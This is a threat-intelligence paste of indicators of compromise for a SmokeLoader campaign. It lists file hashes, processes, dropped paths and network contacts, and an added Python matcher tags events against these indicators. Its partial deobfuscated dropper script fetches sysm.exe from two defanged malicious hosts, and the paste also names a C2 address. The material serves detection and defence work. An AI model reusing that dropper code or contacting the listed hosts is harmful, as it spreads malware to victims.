VRad

#smokeloader_081118

Nov 9th, 2018
#IOC #OptiData #VR #smokeloader #WSH #LZH

https://pastebin.com/JmthzrL4
previous contact:
https://pastebin.com/1scwT0f8
https://pastebin.com/MP3kCSSh
FAQ:
https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/

attack_vector
--------------
email attach (lzh) > js > WSH > GET > %AppData%\MS\Windows\Templates\*.exe

email_headers
--------------
n/a

files
--------------
SHA-256 59e8acea6e292c7e2efde125dc8d4ddeb7c9e91ceff578866c6b725a41145c9d
File name Рахунки ТОВ Техник.lzh
File size 26.37 KB

SHA-256 d54718754d68db8acc82a091b1eb098bb35dfdf0a3cc7c8227030a2787d2ff46
File name 11_2018p.xlsx
File size 12.28 KB

SHA-256 fb9cfe3f02d645f1127c0d9133954a107afd4c99e09295800b85053be5c88c10
File name pax. 00-128 corp. TEXHIK.xls.js
File size 13.99 KB

SHA-256 0d4560c8ea5614f83cd6d33fd695cbbdade3ca7d93916673c9a51de814282b21
File name sysm.exe !This program cannot be run in DOS mode.
File size 518.5 KB

activity
**************

deobfuscated_script
dropper_script:
var wsh = new ActiveXObject("wscript.shell");
var path = wsh.SpecialFolders("templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";
try { var HTTP = new ActiveXObject("MSXML2.XMLHTTP");
var sh = new ActiveXObject("shell.application");
HTTP.Open("GET", "h11p:\ districoperav{.} icu/neifo/sysm.exe", false)
else
HTTP.Open("GET", "h11p:\ varanasiclick{.} ru/neifo/sysm.exe", false)

netwrk
--------------
wscript.exe 2872 79.133.98.58 80 ESTABLISHED

comp
--------------
79.133.98.58 districoperav{.} icu GET /neifo/sysm.exe HTTP/1.1 Mozilla/4.0

C2 h11p:\ aviatorssm{.} bit/

proc
--------------
"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\pax. 00-128 corp. TEXHIK.xls.js"
"C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\120598.exe"

persist
--------------
n/a (detects vm, sleeps)

drop
--------------
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\120598.exe
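
The chain above (WScript running a double-extension .js, a GET to the listed hosts, an .exe dropped into the Templates folder) as a small defender-side IOC matcher, added here as an example and not part of VRad's paste: it refangs the paste's "h11p:\ domain{.} tld" notation, derives the hostnames, and tags process and network events against the hashes, IP and paths listed in the sections above. The sample events are constructed for this example, and the hash check assumes the log source supplies a SHA-256 for the downloaded file.

```python
"""IOC matcher for the SmokeLoader chain in this paste (added example)."""
from __future__ import annotations

import re
from urllib.parse import urlsplit

# Indicators copied from the paste, in the author's defanged notation.
DEFANGED_URLS = [
    "h11p:\\ districoperav{.} icu/neifo/sysm.exe",   # download host 1
    "h11p:\\ varanasiclick{.} ru/neifo/sysm.exe",    # download host 2 (else-branch)
    "h11p:\\ aviatorssm{.} bit/",                    # C2
]
C2_IPS = {"79.133.98.58"}
FILE_HASHES = {
    "59e8acea6e292c7e2efde125dc8d4ddeb7c9e91ceff578866c6b725a41145c9d": "lzh attachment",
    "d54718754d68db8acc82a091b1eb098bb35dfdf0a3cc7c8227030a2787d2ff46": "xlsx",
    "fb9cfe3f02d645f1127c0d9133954a107afd4c99e09295800b85053be5c88c10": "js dropper",
    "0d4560c8ea5614f83cd6d33fd695cbbdade3ca7d93916673c9a51de814282b21": "sysm.exe",
}


def refang(defanged: str) -> str:
    """Reverse the paste's defanging: 'h11p:\\ ' -> 'http://', '{.} ' -> '.'."""
    s = defanged.replace("h11ps:\\ ", "https://").replace("h11p:\\ ", "http://")
    return s.replace("{.} ", ".").replace("{.}", ".")


def ioc_hosts() -> set[str]:
    """Hostnames of the download and C2 URLs, lower-cased for matching."""
    return {urlsplit(refang(u)).hostname.lower() for u in DEFANGED_URLS}


# Host-side patterns taken from the 'proc' and 'drop' sections:
# WScript launched with a <doc-extension>.js file, and an .exe under the
# per-user Office Templates folder (SpecialFolders("templates") in the dropper).
WSCRIPT_DOUBLE_EXT = re.compile(r'wscript\.exe".*\.(?:xls|xlsx|doc|docx)\.js"', re.I)
TEMPLATES_EXE = re.compile(
    r'\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\[^\\"]+\.exe', re.I)


def classify_process(cmdline: str) -> list[str]:
    """Tags for a process-creation command line; empty list means no hit."""
    hits = []
    if WSCRIPT_DOUBLE_EXT.search(cmdline):
        hits.append("wsh-double-extension-js")
    if TEMPLATES_EXE.search(cmdline):
        hits.append("exe-in-templates-folder")
    return hits


def classify_network(dst_ip: str, host: str, sha256: str | None = None) -> list[str]:
    """Tags for a proxy/flow record; sha256 is optional (assumes the log has it)."""
    hits = []
    if dst_ip in C2_IPS:
        hits.append("known-ip")
    if host.lower() in ioc_hosts():
        hits.append("known-host")
    if sha256 and sha256.lower() in FILE_HASHES:
        hits.append("known-hash:" + FILE_HASHES[sha256.lower()])
    return hits


# Constructed sample events (not from the analyst's environment).
SAMPLE_EVENTS = [
    {"type": "process", "cmdline":
        r'"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\pax. 00-128 corp. TEXHIK.xls.js"'},
    {"type": "network", "dst_ip": "79.133.98.58", "host": "districoperav.icu",
     "sha256": "0d4560c8ea5614f83cd6d33fd695cbbdade3ca7d93916673c9a51de814282b21"},
    {"type": "process", "cmdline":
        r'"C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\120598.exe"'},
    {"type": "network", "dst_ip": "93.184.216.34", "host": "example.com"},
]


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (event index, tags) for every event that matched an indicator."""
    out = []
    for i, ev in enumerate(events):
        if ev["type"] == "process":
            hits = classify_process(ev["cmdline"])
        else:
            hits = classify_network(ev["dst_ip"], ev["host"], ev.get("sha256"))
        if hits:
            out.append((i, hits))
    return out


if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["type"], tags)
```

The double-extension and Templates-folder patterns catch the behaviour even after the hosts rotate (the dropper already carries a fallback host), which is why they sit beside the hash and IP lookups rather than replacing them.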
  71.  
# # #
lzh https://www.virustotal.com/#/file/59e8acea6e292c7e2efde125dc8d4ddeb7c9e91ceff578866c6b725a41145c9d/details
xlsx https://www.virustotal.com/#/file/d54718754d68db8acc82a091b1eb098bb35dfdf0a3cc7c8227030a2787d2ff46/details
js https://www.virustotal.com/#/file/fb9cfe3f02d645f1127c0d9133954a107afd4c99e09295800b85053be5c88c10/details
url1 https://www.virustotal.com/#/url/d1aef86fefbdd3fa733f4ea8068e038ef5c39e112f50a7ccaedbc1bb2ffcf03a/details
url2 https://www.virustotal.com/#/url/b5758fb74969c0c998286e5bb2c0242e507a1e6037a3785b03edf2174bca878e/detection
exe https://www.virustotal.com/#/file/0d4560c8ea5614f83cd6d33fd695cbbdade3ca7d93916673c9a51de814282b21/details
https://analyze.intezer.com/#/analyses/08a7d313-03dd-4d6f-9f67-b662f083a559